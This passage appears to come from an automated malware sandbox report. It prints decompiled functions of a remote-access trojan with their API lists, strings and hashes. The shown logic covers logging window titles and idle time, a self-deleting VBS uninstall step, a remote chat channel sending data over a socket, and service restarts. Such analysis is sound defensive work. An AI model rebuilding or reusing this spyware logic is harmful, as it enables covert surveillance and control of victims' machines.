										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = L0044EF23();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043A4CE(GetLastError());
											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											L00448687( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0044F134(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										L0044551E(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043A4CE(_t270);
							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(L0043A504())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043A4CE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = L0044EF23();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043A4F1()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(L0043A504())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043A4F1()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(L0043A504()));
				}
			}





















































                                    0x0044f278
                                    0x0044f27c
                                    0x0044f27d
                                    0x0044f27d
                                    0x0044f27d
                                    0x0044f27f
                                    0x0044f285
                                    0x0044f2a0
                                    0x0044f2a5
                                    0x0044f2a8
                                    0x0044f2aa
                                    0x0044f2ac
                                    0x0044f2cb
                                    0x0044f2d2
                                    0x0044f2d9
                                    0x0044f2dc
                                    0x0044f2e8
                                    0x0044f2eb
                                    0x0044f2f3
                                    0x0044f2f4
                                    0x0044f2f7
                                    0x0044f2f7
                                    0x0044f2fe
                                    0x0044f300
                                    0x0044f303
                                    0x0044f30b
                                    0x0044f30e
                                    0x0044f37b
                                    0x0044f37c
                                    0x0044f382
                                    0x0044f384
                                    0x0044f3cd
                                    0x0044f3d0
                                    0x0044f3d9
                                    0x0044f3dc
                                    0x0044f3df
                                    0x0044f3e1
                                    0x0044f3e1
                                    0x0044f3e1
                                    0x0044f3d2
                                    0x0044f3d5
                                    0x0044f3d5
                                    0x0044f3e6
                                    0x0044f3e9
                                    0x0044f3f5
                                    0x0044f3fa
                                    0x0044f406
                                    0x0044f410
                                    0x0044f414
                                    0x0044f41e
                                    0x0044f421
                                    0x0044f42c
                                    0x0044f431
                                    0x0044f441
                                    0x0044f444
                                    0x0044f448
                                    0x0044f449
                                    0x0044f44f
                                    0x0044f454
                                    0x0044f457
                                    0x0044f459
                                    0x0044f45b
                                    0x0044f460
                                    0x0044f463
                                    0x0044f465
                                    0x0044f48f
                                    0x0044f4b3
                                    0x0044f4b7
                                    0x0044f4bb
                                    0x0044f4bd
                                    0x0044f4c1
                                    0x0044f4c3
                                    0x0044f4cd
                                    0x0044f4d0
                                    0x0044f4d7
                                    0x0044f4d7
                                    0x0044f4d7
                                    0x0044f4d7
                                    0x0044f4c1
                                    0x0044f4dc
                                    0x0044f4e8
                                    0x0044f4ea
                                    0x0044f575
                                    0x0044f575
                                    0x00000000
                                    0x0044f4f0
                                    0x0044f4f0
                                    0x0044f4f4
                                    0x00000000
                                    0x00000000
                                    0x0044f4f9
                                    0x0044f50b
                                    0x0044f513
                                    0x0044f516
                                    0x0044f517
                                    0x0044f51a
                                    0x0044f521
                                    0x0044f526
                                    0x0044f529
                                    0x0044f55d
                                    0x0044f567
                                    0x0044f567
                                    0x0044f571
                                    0x00000000
                                    0x0044f571
                                    0x0044f532
                                    0x0044f54b
                                    0x0044f552
                                    0x0044f375
                                    0x00000000
                                    0x0044f375
                                    0x0044f4ea
                                    0x0044f467
                                    0x00000000
                                    0x0044f433
                                    0x0044f43a
                                    0x0044f43d
                                    0x0044f43f
                                    0x0044f469
                                    0x0044f46b
                                    0x00000000
                                    0x0044f471
                                    0x00000000
                                    0x0044f43f
                                    0x0044f431
                                    0x0044f38c
                                    0x0044f38f
                                    0x0044f3aa
                                    0x0044f3af
                                    0x0044f3b5
                                    0x0044f3b7
                                    0x0044f3c2
                                    0x0044f3c2
                                    0x00000000
                                    0x0044f3b7
                                    0x0044f310
                                    0x0044f317
                                    0x0044f319
                                    0x0044f350
                                    0x0044f350
                                    0x0044f35a
                                    0x0044f35d
                                    0x0044f364
                                    0x0044f364
                                    0x0044f364
                                    0x0044f370
                                    0x00000000
                                    0x0044f370
                                    0x0044f31b
                                    0x0044f31f
                                    0x00000000
                                    0x00000000
                                    0x0044f321
                                    0x0044f330
                                    0x0044f335
                                    0x0044f338
                                    0x0044f339
                                    0x0044f33c
                                    0x0044f33c
                                    0x0044f343
                                    0x0044f345
                                    0x0044f348
                                    0x0044f34b
                                    0x0044f34e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044f2ae
                                    0x0044f2b3
                                    0x0044f2b6
                                    0x0044f2bd
                                    0x00000000
                                    0x0044f2bd
                                    0x0044f287
                                    0x0044f28c
                                    0x0044f292
                                    0x0044f294
                                    0x00000000
                                    0x0044f299

                                    APIs
                                      • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                                    • GetLastError.KERNEL32 ref: 0044F369
                                    • __dosmaperr.LIBCMT ref: 0044F370
                                    • GetFileType.KERNEL32(00000000), ref: 0044F37C
                                    • GetLastError.KERNEL32 ref: 0044F386
                                    • __dosmaperr.LIBCMT ref: 0044F38F
                                    • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                                    • CloseHandle.KERNEL32(?), ref: 0044F4F9
                                    • GetLastError.KERNEL32 ref: 0044F52B
                                    • __dosmaperr.LIBCMT ref: 0044F532
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                    • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                                    • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                                    • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E00409195(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					L00409DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00402489();
						GetWindowTextW(_t77, L00401EEB( &_v100), _t57);
						_t112 = 0x46dd0c;
						if(L00409EAC(0x46dd0c) == 0) {
							L00409DD2(0x46dd0c,  &_v100);
							E0040733F(E00402489() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46c39b;
							if( *0x46c39b == 0) {
								_t112 = L00409E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E004030A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								L00408B80(_t119);
								L00401EF0();
							} else {
								E00407350(_t77, _t127, 0x46dd0c, _t136,  &_v108);
								L00409634(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					L00409C15(_t119);
					if(E004171D6(_t119) < 0xea60) {
						L18:
						L00401EF0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E004171D6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								L0043BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00405343(_t77,  &_v80, L004075C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E004172DA(_t127, _t50);
								L00408B80(_t119);
								L00401FC7();
								L00401FC7();
								L00401FC7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401EF0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}






















                                    0x00409195
                                    0x0040919b
                                    0x0040919e
                                    0x0040919f
                                    0x004091a1
                                    0x004091a3
                                    0x00409202
                                    0x0040920e
                                    0x00409211
                                    0x0040921b
                                    0x00409223
                                    0x0040922a
                                    0x00409234
                                    0x00409245
                                    0x0040924b
                                    0x0040925b
                                    0x00409267
                                    0x0040927b
                                    0x00409280
                                    0x00409287
                                    0x0040928e
                                    0x004092b8
                                    0x004092bc
                                    0x004092c4
                                    0x004092cd
                                    0x00409290
                                    0x00409293
                                    0x0040929a
                                    0x0040929a
                                    0x0040928e
                                    0x0040925b
                                    0x004092d2
                                    0x004092d4
                                    0x004092e5
                                    0x0040938d
                                    0x00409391
                                    0x00000000
                                    0x004092eb
                                    0x004092eb
                                    0x004092ef
                                    0x004092ff
                                    0x00409306
                                    0x00409326
                                    0x00409329
                                    0x0040935a
                                    0x0040935f
                                    0x00409362
                                    0x00409366
                                    0x0040936d
                                    0x00409376
                                    0x0040937f
                                    0x00409388
                                    0x00000000
                                    0x00409388
                                    0x00409308
                                    0x0040930f
                                    0x00409313
                                    0x00409313
                                    0x0040939f
                                    0x00000000
                                    0x0040939f
                                    0x004092e5
                                    0x004093a6
                                    0x004093ac

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004091F7
                                    • Sleep.KERNEL32(000001F4), ref: 00409202
                                    • GetForegroundWindow.USER32 ref: 00409208
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                                    • GetWindowTextW.USER32 ref: 00409245
                                    • Sleep.KERNEL32(000003E8), ref: 00409313
                                      • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                      • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                    • String ID: [ ${ User has been idle for $ ]$ minutes }
                                    • API String ID: 107669343-3343415809
                                    • Opcode ID: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                                    • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                                    • Opcode Fuzzy Hash: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                                    • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040B488(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				E0041015B();
				_t36 = E00402489();
				_t37 = L00401F95(0x46c560);
				_t40 = L00410A30(L00401F95(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E004030A6(_t79,  &_v124, E004172DA( &_v52, E00417093( &_v76)), 0, _t140, L".vbs");
				L00401EF0();
				L00401FC7();
				E00404429(_t79,  &_v100, E004030A6(_t79,  &_v76, E0040427F(_t79,  &_v52, L0043987F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401EF0();
				L00401EF0();
				L00401F6D(_t79,  &_v28);
				_t54 = E0040427F(_t79,  &_v196, L"\"\"\", 0");
				E00403311(E004030A6(_t79,  &_v76, E00403030( &_v52, E004030A6(_t79,  &_v148, E0040427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L0040766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401EEB( &_v100);
				_t68 = E00402489();
				if(L00417947(L00401EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v100), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}





















                                    0x0040b488
                                    0x0040b493
                                    0x0040b49f
                                    0x0040b4a7
                                    0x0040b4cb
                                    0x0040b4d5
                                    0x0040b4d7
                                    0x0040b4e2
                                    0x0040b4e2
                                    0x0040b504
                                    0x0040b50d
                                    0x0040b515
                                    0x0040b547
                                    0x0040b550
                                    0x0040b558
                                    0x0040b560
                                    0x0040b575
                                    0x0040b5ba
                                    0x0040b5c2
                                    0x0040b5ca
                                    0x0040b5d5
                                    0x0040b5e0
                                    0x0040b5eb
                                    0x0040b5f8
                                    0x0040b601
                                    0x0040b60a
                                    0x0040b628
                                    0x0040b64d
                                    0x0040b64d
                                    0x0040b656
                                    0x0040b65e
                                    0x0040b670

                                    APIs
                                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                      • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                      • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                      • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                                    • ExitProcess.KERNEL32 ref: 0040B64D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-2411266221
                                    • Opcode ID: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                                    • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                                    • Opcode Fuzzy Hash: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                                    • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004053ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E004053ED(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = L00401F95( &_v108);
				E004042A6( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E004020EC(_t69, _t120, _t101, _t125, 0x46c238);
				_t121 = _t120 - 0x18;
				E004020EC(_t69, _t121, _t101, _t125,  &_v76);
				E00417478( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					L00401E49( &_v116, _t101, __eflags, 0);
					_t36 = E00402489();
					L00401F95(L00401E49( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = L0040F69B();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						L00401E74( &_v116, _t101);
						L00401FC7();
						L00401FC7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = L0040F931(_t113, "DisplayMessage");
					_t45 = L0040F931(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x46bae4 = _t45;
					_t46 = L0040F931(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x46bae8 = _t46;
					 *0x46bae1 = 1;
					E004020EC(_t69, _t123, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					L00404AA4(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E004020AB(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						L00404AA4(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46baec(L00401F95(L00401E49( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040427F(_t69,  &_v80, 0x45f6b8);
				_t101 =  &_v84;
				E0041739C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				L00404AA4(_t69, _t69,  &_v84, _t128);
				L00401EF0();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}
































                                    0x004053ed
                                    0x004053ed
                                    0x004053fb
                                    0x00405404
                                    0x0040540c
                                    0x00405416
                                    0x0040542a
                                    0x0040542f
                                    0x00405439
                                    0x0040543e
                                    0x00405448
                                    0x00405451
                                    0x00405456
                                    0x00405459
                                    0x0040545c
                                    0x0040550b
                                    0x00405512
                                    0x00405525
                                    0x0040552a
                                    0x00405533
                                    0x00405535
                                    0x00405537
                                    0x004054e0
                                    0x004054e4
                                    0x004054ed
                                    0x004054f6
                                    0x004054fd
                                    0x00405503
                                    0x00405503
                                    0x0040554a
                                    0x00405551
                                    0x00405556
                                    0x0040555b
                                    0x00405562
                                    0x00405567
                                    0x0040556a
                                    0x00405571
                                    0x0040557d
                                    0x00405582
                                    0x00405586
                                    0x0040558b
                                    0x00405594
                                    0x004055a4
                                    0x004055a6
                                    0x004055a8
                                    0x004055b2
                                    0x004055b7
                                    0x004055bb
                                    0x004055c6
                                    0x004055c6
                                    0x00000000
                                    0x004055a6
                                    0x00405462
                                    0x00405465
                                    0x00000000
                                    0x00000000
                                    0x0040547b
                                    0x00405482
                                    0x00405484
                                    0x00000000
                                    0x00000000
                                    0x0040548f
                                    0x00405497
                                    0x0040549d
                                    0x004054a2
                                    0x004054a6
                                    0x004054af
                                    0x00000000
                                    0x004054b4
                                    0x004054cb
                                    0x004054d6
                                    0x004054d6
                                    0x004054de
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 0040540C
                                    • GetMessageA.USER32 ref: 004054BC
                                    • TranslateMessage.USER32(?), ref: 004054CB
                                    • DispatchMessageA.USER32 ref: 004054D6
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: b020ac9687932918c040d728d7396064027af0599af881cd7dcd59637a7a5ecb
                                    • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                                    • Opcode Fuzzy Hash: b020ac9687932918c040d728d7396064027af0599af881cd7dcd59637a7a5ecb
                                    • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416472, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E00416472(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, L00401EEB( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				L00401EF0();
				return _t22;
			}








                                    0x0041647d
                                    0x0041648f
                                    0x0041649e
                                    0x004164a2
                                    0x004164bc
                                    0x004164ce
                                    0x004164d3
                                    0x004164d9
                                    0x004164e2
                                    0x004164f1
                                    0x004164f6
                                    0x004164f9
                                    0x004164fc
                                    0x004164be
                                    0x004164c5
                                    0x004164c8
                                    0x004164ca
                                    0x004164ca
                                    0x004164a4
                                    0x004164a5
                                    0x004164a5
                                    0x00416501
                                    0x0041650e

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                    • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                                    • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                    • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004123B9, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 458COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E004123B9(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a36, intOrPtr _a37, intOrPtr _a41, intOrPtr _a47, char _a61) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				void* _v404;
				int _v408;
				char _v412;
				char _v416;
